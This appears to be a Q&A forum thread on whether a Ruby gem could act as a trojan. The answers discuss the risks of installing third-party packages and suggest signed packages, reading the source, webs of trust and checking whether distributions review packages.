Is there a risk of a Ruby gem acting like a trojan?
Of course there is. You're installing software on your computer that runs with the privileges of the script/user that calls it. It's probably easier to spot malicious code in pure Ruby than in binary packages. But if you think source inspection is a guaranteed way to spot malicious code, check out the under-handed C contest.
That said, if you want to write malware there are more effective delivery systems than Ruby gems. I would not be surprised if the number of actual malicious gems in existence is 0, and thus that the probability that this one is malicious is likewise 0...
There is a risk of malicious code whenever you import unknown logic into an application. The risks are only as deep as the data to which that application has access. Like how Java applets are sandboxed.
Get signed packages you trust, or look at the source.
If I wanted to get a handle on the likelihood of a malicious gem occurring, I'd look at whether malicious packages have been detected in any language (eg python egs, or Perl's CPAN), how likely it is that a malicious package has been produced without anyone noticing, and whether ruby is at any greater risk than other languages.
I might see if I could generate a web of trust - even if I don't know the gem author, do I know someone who does?
I might also look at whether package managers such as Debian examine whether packages are malicious, and if so, whether they've examined the gem you want to use.